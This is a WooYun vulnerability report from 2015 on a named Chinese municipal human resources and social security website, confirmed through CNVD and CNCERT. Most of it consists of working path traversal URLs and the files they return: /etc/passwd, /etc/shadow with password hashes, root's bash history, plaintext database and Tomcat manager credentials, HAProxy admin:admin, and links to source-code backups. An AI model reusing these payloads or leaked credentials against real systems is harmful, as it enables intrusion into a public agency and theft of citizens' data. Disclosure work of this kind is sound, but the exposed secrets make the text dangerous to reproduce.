当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123874

漏洞标题:某人力资源和社保局文件包含漏洞

相关厂商:某人力资源和社保局

漏洞作者: 路人甲

提交时间:2015-07-01 15:17

修复时间:2015-08-17 15:54

公开时间:2015-08-17 15:54

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-03: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向核心白帽子及相关领域专家公开
2015-07-23: 细节向普通白帽子公开
2015-08-02: 细节向实习白帽子公开
2015-08-17: 细节向公众公开

简要描述:

泄漏敏感信息,权限很大,可深入!!

详细说明:

http://www.xtrs.gov.cn/xtzj/new/unitPicUpload

upload.png


任意文件上传,通过上传获得文件路径
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=13532928829532
可进行任意文件下载
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
huawei1:x:500:500::/home/huawei1:/bin/bash
oracle:x:501:502::/home/oracle:/bin/bash


root权限直接获取shadow
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/shadow

root:$1$iLbYVRVe$BsVmNcB/zfplrtUm3sKnl1:15454:0:99999:7:::
bin:*:15454:0:99999:7:::
daemon:*:15454:0:99999:7:::
adm:*:15454:0:99999:7:::
lp:*:15454:0:99999:7:::
sync:*:15454:0:99999:7:::
shutdown:*:15454:0:99999:7:::
halt:*:15454:0:99999:7:::
mail:*:15454:0:99999:7:::
news:*:15454:0:99999:7:::
uucp:*:15454:0:99999:7:::
operator:*:15454:0:99999:7:::
games:*:15454:0:99999:7:::
gopher:*:15454:0:99999:7:::
ftp:*:15454:0:99999:7:::
nobody:*:15454:0:99999:7:::
nscd:!!:15454:0:99999:7:::
vcsa:!!:15454:0:99999:7:::
rpc:!!:15454:0:99999:7:::
mailnull:!!:15454:0:99999:7:::
smmsp:!!:15454:0:99999:7:::
pcap:!!:15454:0:99999:7:::
sshd:!!:15454:0:99999:7:::
rpcuser:!!:15454:0:99999:7:::
nfsnobody:!!:15454:0:99999:7:::
dbus:!!:15454:0:99999:7:::
avahi:!!:15454:0:99999:7:::
haldaemon:!!:15454:0:99999:7:::
avahi-autoipd:!!:15454:0:99999:7:::
distcache:!!:15454:0:99999:7:::
mysql:!!:15454:0:99999:7:::
ntp:!!:15454:0:99999:7:::
apache:!!:15454:0:99999:7:::
postgres:!!:15454:0:99999:7:::
webalizer:!!:15454:0:99999:7:::
squid:!!:15454:0:99999:7:::
named:!!:15454:0:99999:7:::
xfs:!!:15454:0:99999:7:::
gdm:!!:15454:0:99999:7:::
sabayon:!!:15454:0:99999:7:::
oprofile:!!:15454:0:99999:7:::
dovecot:!!:15454:0:99999:7:::
huawei1:$1$6$ScQ/QcKZKxKzDiZzJYiJV/:16212:0:99999:7:::
oracle:$1$hM4jNP5o$UVFx7qNesYgn0sr5J2dvO0:16443:0:99999:7:::


ssh端口开放,密码我没破出来
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/hosts

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1		xtwebapp1 localhost.localdomain localhost
10.137.75.20    xtwebdb1
10.137.75.30    xtwebdb2
::1		localhost6.localdomain6 localhost6


http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../root/.bash_history

1.png


从bash里找到网站跟目录/usr/local/apache-tomcat-7.0.27/webapps
然后数据库配置文件jdbc.properties

jdbc.driver=oracle.jdbc.OracleDriver
#jdbc.url=jdbc:oracle:thin:@10.141.136.58:1521:hygeia
#jdbc.url=jdbc:oracle:thin:@172.18.100.108:1521:develop
#jdbc.url=jdbc:oracle:thin:@localhost:1521:orcl
#jdbc.url=jdbc:oracle:thin:@10.141.136.38:1521:czwebcx
jdbc.url=jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 10.137.75.30)(PORT = 1521))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.137.75.20)(PORT = 1521))(LOAD_BALANCE = yes)(FAILOVER = ON)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = orcl)(FAILOVER_MODE=(TYPE = SELECT)(METHOD = BASIC)(RETIRES = 20)(DELAY = 15))))
#jdbc.username=czportal
#jdbc.password=Czxx#622#zx$&system
#jdbc.username=cmsczportal
#jdbc.password=cmsczportal
#jdbc.username=cmstouch
#jdbc.password=cmstouch
#jdbc.username=cmsks
#jdbc.password=yanquebeilu$CZRSKS$20111018
jdbc.username=xtrsks
jdbc.password=xtrsks


以前的密码还是蛮屌的

<Context reloadable="true"> 
    <WatchedResource>WEB-INF/web.xml</WatchedResource> 
    <Resource name="jdbc/xthr" auth="Container" type="javax.sql.DataSource" 
     maxActive="100" maxIdle="20" maxWait="10000" username="opencms" password="xtrsxxzx" driverClassName="oracle.jdbc.driver.OracleDriver" 
     url="jdbc:oracle:thin:@(DESCRIPTION=(LOAD_BALANCE=on)(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.137.75.20) (PORT=1521))(ADDRESS=(PROTOCOL=TCP)(HOST=10.137.75.30)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=orcl)))"/>
</Context>


http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../..//usr/local/apache-tomcat-7.0.27/conf/tomcat-users.xml

<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at
      http://www.apache.org/licenses/LICENSE-2.0
  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users>
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary.
-->
<!--
  NOTE:  The sample user and role entries below are wrapped in a comment
  and thus are ignored when reading this file. Do not forget to remove
  <!.. ..> that surrounds them.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
-->
<role rolename="manager-gui"/>
<user username="tomcat" password="tomcat$xt$123$RS" roles="manager-gui"/> 
</tomcat-users>


http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../../usr/haproxy/haproxy.cfg

global                                
         log 127.0.0.1   local0 
         #log 127.0.0.1  local1 notice
         #log loghost    local0 info
       ulimit-n 82000       
         maxconn 4096        
         chroot /usr/haproxy    
         uid 99                       
         gid 99                       
         daemon                   
         nbproc 3                
        pidfile /usr/haproxy/logs/haproxy.pid     
#         debug       
         #quiet     
defaults                       
         log     global
         log     127.0.0.1       local3        
         mode    http                            
         option  httplog                        
         option  httpclose   
 
        option  dontlognull
        option  forwardfor  
 
        option  redispatch
         retries 2                           
        maxconn 2000         
         balance roundrobin                     
         stats   uri     /stats        
         contimeout      50000                         
         clitimeout      500000                 
         srvtimeout      500000             
listen app-balancer 0.0.0.0:9090
         mode http
       #  log 127.0.0.1 local3
         #cookie ServerID insert nocache
         cookie ServerID prefix
         cookie JSESSIONID prefix
        capture request header Cookie len 200
         capture request header X-Forwarded-For len 15
         capture request header Host len 15
         capture request header Referrer len 15
        appsession JSESSIONID len 52 timeout 1080000
         balance roundrobin
         option httpchk GET /ggfw_web/test.html HTTP/1.0   
         server ggfwweb_1 10.137.75.12:7001 cookie app1 minconn 100 maxconn 40960 check inter 5000 rise 2 fall 5 weight 2
         server ggfwweb_2 10.137.75.13:7001 cookie app2 minconn 100 maxconn 40960 check inter 2000 rise 2 fall 5 weight 2
         #option forwardfor except 192.168.0.159
         option forwardfor
         stats enable
         stats uri /stats
         stats realm "ggfw monitor"
         stats auth admin:admin
账号 密码 admin admin


stats.png


2.png


被人恶意破坏利用就不好了
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../../usr/local/apache-tomcat-7.0.27/webapps/XTExam.zip
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../..//usr/local/apache-tomcat-7.0.27/webapps_1/cmsczportal.zip
网站源码备份,代码审计是什么?就不深入搞了,不爱喝茶


漏洞证明:

http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/passwd
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/shadow
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/shadow
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../root/.bash_history
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../..//usr/local/apache-tomcat-7.0.27/conf/tomcat-users.xml
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../../usr/haproxy/haproxy.cfg

修复方案:

我什么都不懂~ =。=!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-03 15:52

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发湖南分中心,由湖南分中心后续协调网站管理单位处置。

最新状态:

暂无